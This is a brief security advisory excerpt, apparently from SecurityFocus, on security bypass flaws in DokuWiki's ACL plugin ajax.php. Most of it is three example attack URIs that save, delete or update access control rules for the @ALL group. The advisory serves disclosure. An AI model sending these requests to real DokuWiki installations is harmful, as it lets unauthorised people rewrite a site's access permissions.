DokuWiki 'ajax.php' Multiple Security Bypass Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL)
http://www.example.com/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
http://www.example.com/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)


 

Privacy Statement
Copyright 2010, SecurityFocus